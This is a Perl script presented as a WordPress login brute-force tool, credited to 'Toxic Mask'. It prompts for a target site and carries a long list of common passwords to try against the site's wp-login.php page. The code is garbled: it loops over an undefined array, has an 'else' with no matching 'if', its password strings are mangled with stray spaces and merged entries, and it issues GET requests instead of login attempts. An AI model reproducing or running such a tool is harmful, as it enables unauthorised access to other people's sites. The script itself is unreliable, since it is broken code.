#/usr/bin/perl 

use HTTP::Request; use LWP::UserAgent; system('cls'); system('Wordpress Brute Force v.1'); system "color green";
  print"\n";
   print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n"; print "\t> [!]Wordpress Brute Force v.1 >\n"; print "\t> [!]Develope By Toxic Mask >\n"; print "\t> ====================================== >\n"; 
   print "\t> [!]Please Visite ==> ricositumorang884@gmail.com >\n"; 
   print "\t> [!]Contact Us ==> ricositumorang884@gmail.com >\n"; print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
    print "\n";
    print " Please Enter Target Site URL:\n Example: www.target.com or www.target/path\n-> "; $site=<STDIN>; 
    chomp $site; 
    print "\n"; print 
    " Enter site source code\n\n 1 = php\n 2 = asp\n 3 = aspx\n 4 = cfm\n 5 = js\n 6 = cgi\n 7 = brf\n\n-> "; print "If you dont't know try to find out throgh Nmap scanning tool \n"; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/wp-login.php'; } print "\n"; print "-> Target: $site\n"; print "-> Site source code: $code\n"; print "-> Searching password ...\n\n\n"; if($code eq "2"){ @path1=('123456',' password',' 123456789',' 12345678 ','12345 qwerty',' 123123 ','111111 ','abc123 1234567',' dragon ','1q2w3e4r sunshine ','654321',' master ','1234 ','football ','1234567890 ','000000',' computer',' 666666',' superman',' michael',' internet',' iloveyou',' daniel ','1qaz2wsx',' monkey',' shadow',' jessica',' letmein',' baseball ','whatever',' princess',' abcd1234 ','123321',' starwars ','121212',' thomas ','zxcvbnm',' trustno1 ','killer',' welcome ','jordan',' aaaaaa',' 123qwe',' freedom',' password1',' charlie ','batman ','jennifer',' 7777777',' michelle',' diamond',' oliver ','mercedes',' benjamin',' 11111111',' snoopy',' samantha',' victoria ','matrix ','george',' alexander',' secret',' cookie',' asdfgh',' 987654321',' 123abc',' orange ','fuckyou',' asdf1234',' pepper',' hunter',' silver ','joshua',' banana',' 1q2w3e',' chelsea',' 1234qwer',' summer',' qwertyuiop',' phoenix',' andrew',' q1w2e3r4 ','elephant',' rainbow',' mustang',' merlin',' london',' garfield ','robert ','chocolate',' 112233 ','samsung ','qazwsx',' matthew',' buster',' jonathan ','ginger',' flower',' 555555 ','test',' caroline ','amanda',' maverick',' midnight',' martin',' junior',' 88888888',' anthony',' jasmine',' creative ','patrick',' mickey',' 123 ' 'qwerty123',' cocacola',' chicken',' passw0rd',' forever',' william',' nicole',' hello',' yellow',' nirvana',' justin','friends ','cheese',' tigger',' mother',' liverpool',' blink182','asdfghjkl',' andrea',' spider',' scooter',' richard ','soccer ','rachel ','purple',' morgan',' melissa',' jackson ','arsenal ','222222 ','qwe123',' gabriel ','ferrari',' jasper',' danielle',' bandit',' angela',' scorpion',' prince ','maggie',' austin',' veronica ','nicholas',' monster ','dexter ','carlos ','thunder',' success',' hannah',' ashley',' 131313',' stella',' brandon',' pokemon ','joseph',' asdfasdf',' 999999 ','metallica',' december','chester ','taylor',' sophie',' samuel',' rabbit',' crystal',' barney ','xxxxxx',' steven',' ranger ','patricia',' christian',' asshole',' spiderman',' sandra',' hockey ','angels ','security',' parker ','heather',' 888888',' victor ','harley ','333333',' system ','slipknot november',' jordan23',' canada',' tennis',' qwertyui',' casper',' gemini ','asd123',' winter ','hammer',' cooper ','america',' albert',' 777777 ','winner ','charles',' butterfly ','swordfish',' popcorn',' penguin',' dolphin',' carolina',' access',' 987654 ','hardcore',' corvette','apples','12341234',' sabrina',' remember ','qwer1234',' edward ','dennis ','cherry',' sparky natasha ','arthur ','vanessa ','marina ','leonardo ','johnny dallas ','antonio ','winston snickers',' olivia',' nothing ','iceman ','destiny',' coffee',' apollo ','696969 ','windows',' williams',' school',' madison',' dakota',' angelina ','anderson',' 159753',' 1111 ','yamaha ','trinity',' rebecca ','nathan guitar',' compaq ','123123123 ','toyota ','shannon',' playboy',' peanut',' pakistan ','diablo ','abcdef ','maxwell ','golden',' asdasd',' 123654 ','murphy ','monica',' marlboro',' kimberly',' gateway',' bailey ','00000000',' snowball',' scooby ','nikita',' falcon',' august',' test123',' sebastian',' panther ','love',' johnson',' godzilla ','genesis',' brandy',' adidas',' zxcvbn',' wizard',' porsche',' online ','hello123',' fuckoff ','eagles',' champion',' bubbles ','boston ','smokey',' precious',' mercury',' lauren',' einstein',' cricket',' cameron ','angel ','admin ','napoleon',' mountain',' lovely',' friend',' flowers',' dolphins ','david ','chicago ','sierra ','knight',' yankees ','wilson',' warrior',' simple ','nelson',' muffin',' charlotte ','calvin',' spencer ','newyork',' florida',' fernando ','claudia ','basketball',' barcelona ','87654321',' willow',' stupid',' samson police ','para',' manager ','jaguar ','jackie',' family ','doctor',' bullshit',' brooklyn ','tigers ','stephanie',' slayer',' peaches',' miller',' heaven ','elizabeth ','bulldog',' animal ','789456 ','scorpio',' rosebud ','qwerty12 ','franklin',' claire',' american',' vincent',' testing',' pumpkin',' platinum',' louise',' kitten ','general ','united ','turtle',' marine',' icecream',' hacker ','darkness',' cristina ','colorado ','boomer',' alexandra',' steelers',' serenity',' please',' montana',' mitchell ','marcus ','lollipop ','jessie',' happy ','cowboy ','102030 ','marshall',' jupiter',' jeremy',' gibson ','fucker ','barbara ','adrian',' 1qazxsw2 ','12344321',' 11111',' startrek',' fishing',' digital',' christine',' business',' abcdefg ','nintendo',' genius',' 12qwaszx ','walker ','q1w2e3',' player ','legend',' carmen',' booboo',' tomcat ','ronaldo ','people',' pamela',' marvin',' jackass ','google ','fender  ','isabelle ','isabella ','eclipse ','dreamer ','changeme ','cassie ','badboy ','123456a ','stanley ','sniper ','rocket ','passport ','pandora ','justice ','infinity ','cookies ','barbie ','xavier ','unicorn ','superstar ','stephen ','rangers ','orlando ','money ','domino ','courtney ','viking ','tucker ','travis ','scarface ','pavilion ','nicolas ','natalie ','gandalf','freddy','donald','captain ','abcdefgh ','a1b2c3d4','speedy ','peter','nissan','loveyou ','harrison','friday','francis ','dancer','159357','101010 ','spitfire','saturn','nemesis ','little','dreams','catherine ','brother','birthday','1111111 ','wolverine ','victory ','student','france','fantasy ','enigma','copper','bonnie ','teresa','mexico','guinness ','georgia','california','sweety');  
 foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); { print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } }
